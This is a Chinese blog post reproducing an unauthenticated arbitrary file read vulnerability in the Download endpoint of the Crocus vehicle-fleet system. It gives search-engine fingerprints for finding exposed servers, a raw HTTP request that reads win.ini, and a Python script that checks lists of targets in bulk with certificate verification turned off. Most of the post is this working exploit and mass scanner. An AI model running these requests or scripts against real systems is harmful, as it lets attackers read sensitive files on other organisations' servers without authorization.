首页 > 其他分享 >【漏洞复现】Crocus系统文件读取漏洞复现

【漏洞复现】Crocus系统文件读取漏洞复现

时间:2024-08-12 18:25:49浏览次数:9  
标签:读取 url args URL 漏洞 复现 file 系统文件


》》》漏洞描述《《《

        Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术,帮助商用车减少交通事故和货物丢失,提高企业或车队的运营效率。其Download接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。


》》》信息收集《《《

fofa:body="inp_verification"
hunter:web.body="inp_verification"


》》》漏洞复现《《《

访问目标网站

构造数据包

GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
Host:ip

成功读取win.ini文件,存在任意文件读取漏洞

批量测试

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
该脚本用于检测目标URL是否存在Crocus-Download任意文件读取漏洞。
通过发送HTTP请求并检查响应内容来判断漏洞是否存在。
"""

import requests
import argparse
from urllib3.exceptions import InsecureRequestWarning

# 忽略SSL证书验证警告
# 忽略证书验证警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# 定义常量,用于文本颜色高亮
RED = '\033[91m'
RESET = '\033[0m'

def check_file_read(url):
    """
    检查给定URL是否存在任意文件读取漏洞。

    :param url: 待检测的URL。
    """
    # 设置User-Agent头,模拟浏览器请求
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15'
    }

    # 构造请求的URL,尝试读取C:/windows/win.ini文件
    file_read_url = f"{url.rstrip('/')}/Service.do?Action=Download&Path=C:/windows/win.ini"
  
    try:
        # 发送GET请求,并忽略SSL证书验证
        response = requests.get(file_read_url, headers=headers, verify=False, timeout=30)
        # 检查响应状态码是否为200,并且响应内容是否包含"fonts",作为漏洞存在的标志
        if response.status_code == 200 and "fonts" in response.text:
            print(f"{RED}URL [{url}] 存在 Crocus-Download 任意文件读取漏洞{RESET}")
        else:
            print(f"URL [{url}] 可能不存在漏洞")
    except requests.RequestException as e:
        # 打印请求过程中发生的异常
        print(f"URL [{url}] 请求失败: {e}")

def main():
    """
    主函数,负责解析命令行参数并调用漏洞检测函数。
    """
    # 使用argparse库解析命令行参数
    parser = argparse.ArgumentParser(description='检测目标地址是否存在 Crocus-Download 任意文件读取漏洞')
    parser.add_argument('-u', '--url', help='指定目标地址')
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

    args = parser.parse_args()

    # 如果指定了URL参数
    if args.url:
        # 如果URL没有以http://或https://开头,自动添加
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url
        check_file_read(args.url)
    # 如果指定了文件参数
    elif args.file:
        # 打开文件,读取其中的URLs
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            # 遍历每个URL进行检测
            for url in urls:
                # 如果URL没有以http://或https://开头,自动添加
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url
                check_file_read(url)

if __name__ == '__main__':
    main()

运行截图


标签:读取,url,args,URL,漏洞,复现,file,系统文件
From: https://blog.csdn.net/qq_48368964/article/details/141138692

相关文章

  • Nexpose v6.6.264 for Linux & Windows - 漏洞扫描
    Nexposev6.6.264forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,releaseAug07,2024请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随......
  • 一款强大的burpsuite漏洞扫描插件--gatherBurp
    一款强大的burpsuite漏洞扫描插件目前功能fastjson扫描权限绕过扫描未授权检测扫描sql注入检测多层级路由扫描工具调用log4j检测复杂数据提交一键生成nuclei模板生成指定kb大小的随机字符串代理池功能子域名收集(复刻https://github.com/Acmesec/Sylas)使用说明请使用m......
  • 信息安全-信息安全运营(安全监控与审计 漏洞管理)
    https://mp.weixin.qq.com/s/E-0_-vExLLV4NklaIQYaHQ信息安全-信息安全运营(安全监控与审计漏洞管理)原创被摧残的IT人生被摧残的IT人生2024年07月25日09:00广东本期看点前期已发布并完结IT建设之路(专业技术篇),包括“企业IT管理”、“IT技术架构”、“信息安全”、“应用架......
  • 【复现失败】土豆
    重新试了一下payload:SeImpersonatePrivilege和SeAssignPrimaryTokenPrivilege是高级权限,通常只有在具有管理员权限的用户或特定的系统服务中才会启用。下面是这两种权限的详细信息以及如何获取这些权限:1.SeImpersonatePrivilege描述:允许用户以其他用户的身......
  • sqli-labs漏洞靶场~SQL注入(全网最全详解)
    #sqli-labs靶场适合于初学sql注入的新手,它包含了许多的场景和模式为练习者提供良好的练习平台,以下这些语句搞懂我们做靶场就如鱼得水,非常自信的可以完成。查询当前数据库版本:selectversion();●查询当前数据库:selectdatabase();●查询当前路径:select@@basedir;●......
  • 【EI复现】梯级水光互补系统最大化可消纳电量期望短期优化调度模型(Matlab代码实现)
    ......
  • 什么是CSRF?CSRF漏洞原理攻击与防御(非常详细)零基础入门到精通,收藏这一篇就够了
    一、什么是CSRF?CSRF(Cross-siterequestforgery,跨站请求伪造)也被称为OneClickAttack或者SessionRiding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任......
  • 常见框架漏洞复现
    环境使用Debian虚拟机,配置docker与docker-composeaptinstalldocker.ioaptinstalldocker-compose配置后下载vulhub靶场gitclonehttps://github.com/vulhub/vulhub.git后发现,环境还是无法启动成功,重新打开终端输入dockerhub加速服务sudomkdir-p/etc/dockersudo......
  • CORS与JSONP漏洞原理及其复现
    文章目录CORS跨域共享介绍同源策略配置产生条件复现自动化爆破工具JSONP跨域回调介绍复现自动审查工具安装教程使用教程在现代Web开发中,跨域资源共享(CORS)和JSONP是两种重要的跨域通信技术。CORS通过设置HTTP头来控制资源共享,而JSONP则利用了本文将深入探讨......
  • Windows出大事,超高危漏洞 + 降级攻击风险;“0.0.0.0日”漏洞卷土重来,盯上MacOs和Linux;
    新闻1:警告!18年前的浏览器漏洞卷土重来,MacOS和Linux设备面临威胁!网络安全研究人员发现了一个新的“0.0.0.0日”漏洞,该漏洞影响所有主流网络浏览器,恶意网站可能会利用该漏洞侵入本地网络。OligoSecurity的研究员AviLumelsky表示,这一严重漏洞“暴露了浏览器处理网络请求时......